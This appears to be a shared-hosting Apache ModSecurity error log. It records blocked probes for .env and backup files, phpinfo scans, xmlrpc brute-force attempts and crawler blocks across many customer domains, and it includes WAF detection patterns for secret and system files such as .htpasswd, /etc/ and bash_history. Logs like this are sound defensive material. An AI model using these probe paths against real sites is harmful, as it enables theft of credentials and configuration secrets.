[Tue May 26 16:38:58.851086 2026] [security2:error] [pid 817651:tid 817806] [client 208.84.100.18:19216] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "mail.omshriinfrastructures.com"] [uri "/.env.backup"] [unique_id "ahV_StlGRCPPN1dS2y2cnQAAAJ4"]
[Tue May 26 16:38:58.849795 2026] [security2:error] [pid 817651:tid 817858] [client 208.84.100.18:19294] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "mail.omshriinfrastructures.com"] [uri "/.env.local.old"] [unique_id "ahV_StlGRCPPN1dS2y2chgAAANI"]
[Tue May 26 16:38:58.852299 2026] [security2:error] [pid 817651:tid 817870] [client 208.84.100.18:19248] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "mail.omshriinfrastructures.com"] [uri "/.env~"] [unique_id "ahV_StlGRCPPN1dS2y2clwAAAN4"]
[Tue May 26 16:38:58.852571 2026] [security2:error] [pid 817651:tid 817890] [client 208.84.100.18:19288] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "mail.omshriinfrastructures.com"] [uri "/.env.local.bak"] [unique_id "ahV_StlGRCPPN1dS2y2ckQAAAPI"]
[Tue May 26 16:38:59.087993 2026] [security2:error] [pid 817651:tid 817798] [client 193.37.33.142:26335] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 142.33.37.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahV_StlGRCPPN1dS2y2cpwAAAJY"]
[Tue May 26 16:38:59.306366 2026] [security2:error] [pid 817651:tid 817839] [client 114.119.156.9:54723] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.plenitudotonal.com"] [uri "/nueva/sede"] [unique_id "ahV_S9lGRCPPN1dS2y2csgAAAL8"], referer: https://www.plenitudotonal.com/nueva/modelo-asistencial
[Tue May 26 16:39:01.389619 2026] [security2:error] [pid 817651:tid 817883] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_StlGRCPPN1dS2y2ccwAAAOs"]
[Tue May 26 16:39:02.722448 2026] [security2:error] [pid 817651:tid 817817] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_TNlGRCPPN1dS2y2cxAAAAKk"]
[Tue May 26 16:39:04.704734 2026] [security2:error] [pid 817651:tid 817864] [client 117.198.37.168:65340] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_UNlGRCPPN1dS2y2dUQAAANg"]
[Tue May 26 16:39:04.704851 2026] [security2:error] [pid 817651:tid 817864] [client 117.198.37.168:65340] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_UNlGRCPPN1dS2y2dUQAAANg"]
[Tue May 26 16:39:04.981100 2026] [security2:error] [pid 817651:tid 817848] [client 195.178.110.34:60014] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digentasmartsn.com"] [uri "/phpinfo.php"] [unique_id "ahV_UNlGRCPPN1dS2y2dVQAAAMg"]
[Tue May 26 16:39:05.169451 2026] [security2:error] [pid 817651:tid 817905] [client 20.127.244.253:36514] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "162.215.241.212"] [uri "/index.php"] [unique_id "ahV_UNlGRCPPN1dS2y2dPAAAAQE"]
[Tue May 26 16:39:05.205092 2026] [security2:error] [pid 817651:tid 817856] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_T9lGRCPPN1dS2y2dHAAAANA"]
[Tue May 26 16:39:05.931976 2026] [security2:error] [pid 817651:tid 817863] [client 209.163.119.130:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV_UdlGRCPPN1dS2y2ddgAAANc"], referer: https://www.anujtradingco.com/
[Tue May 26 16:39:07.527882 2026] [security2:error] [pid 817651:tid 817802] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_UNlGRCPPN1dS2y2dSgAAAJo"]
[Tue May 26 16:39:09.182128 2026] [security2:error] [pid 817651:tid 817807] [client 209.163.119.130:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV_VdlGRCPPN1dS2y2dzQAAAJ8"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1231260&moderation-hash=4e97258ee3c811d5af5ba9e1633ff3e2
[Tue May 26 16:39:09.313824 2026] [security2:error] [pid 817651:tid 817821] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_UtlGRCPPN1dS2y2dhAAAAK0"]
[Tue May 26 16:39:10.597948 2026] [security2:error] [pid 817651:tid 817811] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_U9lGRCPPN1dS2y2dpAAAAKM"]
[Tue May 26 16:39:11.787821 2026] [security2:error] [pid 817651:tid 817852] [client 195.178.110.34:60040] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digentasmartsn.com"] [uri "/phpinfo.php"] [unique_id "ahV_V9lGRCPPN1dS2y2eLAAAAMw"]
[Tue May 26 16:39:12.407054 2026] [security2:error] [pid 817651:tid 817892] [client 219.94.128.161:0] ModSecurity: Warning. Matched phrase "LWP::Simple" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahV_WNlGRCPPN1dS2y2ePAAAAPQ"]
[Tue May 26 16:39:12.415928 2026] [security2:error] [pid 817651:tid 817808] [client 219.94.128.161:54841] ModSecurity: Warning. Matched phrase "LWP::Simple" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/"] [unique_id "ahV_WNlGRCPPN1dS2y2eOgAAAKA"]
[Tue May 26 16:39:13.080768 2026] [security2:error] [pid 817651:tid 817836] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_VtlGRCPPN1dS2y2d9wAAALw"]
[Tue May 26 16:39:13.306519 2026] [security2:error] [pid 817651:tid 817906] [client 219.94.128.161:0] ModSecurity: Warning. Matched phrase "LWP::Simple" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.cagmedya.com"] [uri "/wp-content/cache/speedycache/www.cagmedya.com/all/index.html"] [unique_id "ahV_WdlGRCPPN1dS2y2eVQAAAQI"]
[Tue May 26 16:39:13.822357 2026] [security2:error] [pid 817651:tid 817882] [client 219.94.128.161:54843] ModSecurity: Warning. Matched phrase "LWP::Simple" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.cagmedya.com"] [uri "/"] [unique_id "ahV_WdlGRCPPN1dS2y2eUwAAAOo"]
[Tue May 26 16:39:14.057307 2026] [security2:error] [pid 817651:tid 817902] [client 114.119.130.240:58799] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujoverseas.in"] [uri "/works/portfolio-boxed-square/page/2"] [unique_id "ahV_WtlGRCPPN1dS2y2eaQAAAP4"], referer: https://www.anujoverseas.in/works/portfolio-boxed-square/page/2?id=1123932755&ucat=148
[Tue May 26 16:39:15.096715 2026] [security2:error] [pid 817651:tid 817793] [client 117.198.37.168:49266] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_W9lGRCPPN1dS2y2ekwAAAJE"]
[Tue May 26 16:39:15.096863 2026] [security2:error] [pid 817651:tid 817793] [client 117.198.37.168:49266] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_W9lGRCPPN1dS2y2ekwAAAJE"]
[Tue May 26 16:39:15.893887 2026] [security2:error] [pid 817651:tid 817791] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_WNlGRCPPN1dS2y2eQwAAAI8"]
[Tue May 26 16:39:18.600301 2026] [security2:error] [pid 817651:tid 817871] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_WtlGRCPPN1dS2y2eegAAAN8"]
[Tue May 26 16:39:19.251294 2026] [security2:error] [pid 817651:tid 817893] [client 138.229.106.195:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV_X9lGRCPPN1dS2y2e8QAAAPU"], referer: https://www.anujtradingco.com/
[Tue May 26 16:39:19.389097 2026] [security2:error] [pid 817651:tid 817907] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_W9lGRCPPN1dS2y2engAAAQM"]
[Tue May 26 16:39:20.622493 2026] [security2:error] [pid 817651:tid 817827] [client 138.229.106.195:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV_YNlGRCPPN1dS2y2fBAAAALM"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1157054&moderation-hash=1470d6af7a4ecaf9053cee58ccfa4276
[Tue May 26 16:39:22.294368 2026] [security2:error] [pid 817651:tid 817831] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_XtlGRCPPN1dS2y2e2QAAALc"]
[Tue May 26 16:39:22.389930 2026] [security2:error] [pid 817651:tid 817826] [client 106.198.126.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_XtlGRCPPN1dS2y2e3gAAALI"]
[Tue May 26 16:39:23.739980 2026] [security2:error] [pid 817651:tid 817806] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_YNlGRCPPN1dS2y2e-wAAAJ4"]
[Tue May 26 16:39:24.550225 2026] [security2:error] [pid 817651:tid 817830] [client 114.119.136.137:62483] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "operatives.org.in"] [uri "/operatives-web-disclaimer.php"] [unique_id "ahV_ZNlGRCPPN1dS2y2fagAAALY"], referer: http://operatives.org.in/
[Tue May 26 16:39:25.475566 2026] [core:crit] [pid 817651:tid 817804] (13)Permission denied: [client 66.249.70.136:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:39:25.764047 2026] [security2:error] [pid 817651:tid 817902] [client 117.198.37.168:49578] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_ZdlGRCPPN1dS2y2fhAAAAP4"]
[Tue May 26 16:39:25.764202 2026] [security2:error] [pid 817651:tid 817902] [client 117.198.37.168:49578] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_ZdlGRCPPN1dS2y2fhAAAAP4"]
[Tue May 26 16:39:25.864844 2026] [security2:error] [pid 817651:tid 817792] [client 195.178.110.34:33274] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.digentasmartsn.com"] [uri "/___proxy_subdomain_cpanel/portal/.env"] [unique_id "ahV_ZdlGRCPPN1dS2y2fjQAAAJA"]
[Tue May 26 16:39:26.392753 2026] [security2:error] [pid 817651:tid 817880] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_YtlGRCPPN1dS2y2fMQAAAOg"]
[Tue May 26 16:39:26.657651 2026] [security2:error] [pid 817651:tid 817899] [client 176.65.139.229:19098] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "demo.azurmediatec.com"] [uri "/.env"] [unique_id "ahV_ZtlGRCPPN1dS2y2fpQAAAPs"]
[Tue May 26 16:39:28.150564 2026] [security2:error] [pid 817651:tid 817827] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_ZNlGRCPPN1dS2y2faQAAALM"]
[Tue May 26 16:39:29.291325 2026] [security2:error] [pid 817651:tid 817822] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_ZdlGRCPPN1dS2y2fiAAAAK4"]
[Tue May 26 16:39:30.566756 2026] [security2:error] [pid 817651:tid 817788] [client 5.255.99.53:39842] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "plenitudotonal.com"] [uri "/.env.old"] [unique_id "ahV_atlGRCPPN1dS2y2f6gAAAIw"]
[Tue May 26 16:39:31.170595 2026] [security2:error] [pid 817651:tid 817811] [client 5.255.99.53:39750] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_atlGRCPPN1dS2y2f9gAAAKM"]
[Tue May 26 16:39:31.170640 2026] [security2:error] [pid 817651:tid 817791] [client 5.255.99.53:40018] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_atlGRCPPN1dS2y2f9AAAAI8"]
[Tue May 26 16:39:31.176249 2026] [security2:error] [pid 817651:tid 817836] [client 5.255.99.53:39952] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_atlGRCPPN1dS2y2f9QAAALw"]
[Tue May 26 16:39:31.234760 2026] [security2:error] [pid 817651:tid 817797] [client 5.255.99.53:40032] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_a9lGRCPPN1dS2y2f9wAAAJU"]
[Tue May 26 16:39:31.422471 2026] [security2:error] [pid 817651:tid 817840] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_Z9lGRCPPN1dS2y2fzAAAAMA"]
[Tue May 26 16:39:31.482862 2026] [security2:error] [pid 817651:tid 817874] [client 5.255.99.53:39842] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_a9lGRCPPN1dS2y2f-wAAAOI"]
[Tue May 26 16:39:31.986832 2026] [security2:error] [pid 817651:tid 817787] [client 5.255.99.53:40018] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_a9lGRCPPN1dS2y2f_wAAAIs"]
[Tue May 26 16:39:31.996772 2026] [security2:error] [pid 817651:tid 817837] [client 5.255.99.53:39732] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_a9lGRCPPN1dS2y2gAQAAAL0"]
[Tue May 26 16:39:31.996779 2026] [security2:error] [pid 817651:tid 817822] [client 5.255.99.53:39842] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_a9lGRCPPN1dS2y2gAgAAAK4"]
[Tue May 26 16:39:31.998455 2026] [security2:error] [pid 817651:tid 817828] [client 5.255.99.53:40010] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_a9lGRCPPN1dS2y2gAAAAALQ"]
[Tue May 26 16:39:32.063377 2026] [security2:error] [pid 817651:tid 817872] [client 5.255.99.53:39750] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_a9lGRCPPN1dS2y2gBAAAAOA"]
[Tue May 26 16:39:32.080910 2026] [security2:error] [pid 817651:tid 817875] [client 5.255.99.53:40032] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_a9lGRCPPN1dS2y2gBgAAAOM"]
[Tue May 26 16:39:32.085117 2026] [security2:error] [pid 817651:tid 817790] [client 5.255.99.53:39968] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_a9lGRCPPN1dS2y2gBQAAAI4"]
[Tue May 26 16:39:32.092184 2026] [security2:error] [pid 817651:tid 817867] [client 5.255.99.53:39952] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_a9lGRCPPN1dS2y2gAwAAANs"]
[Tue May 26 16:39:32.826923 2026] [security2:error] [pid 817651:tid 817841] [client 5.255.99.53:39684] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahV_adlGRCPPN1dS2y2f4AAAAME"]
[Tue May 26 16:39:32.915439 2026] [security2:error] [pid 817651:tid 817848] [client 5.255.99.53:39784] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "plenitudotonal.com"] [uri "/.env.backup"] [unique_id "ahV_bNlGRCPPN1dS2y2gGwAAAMg"]
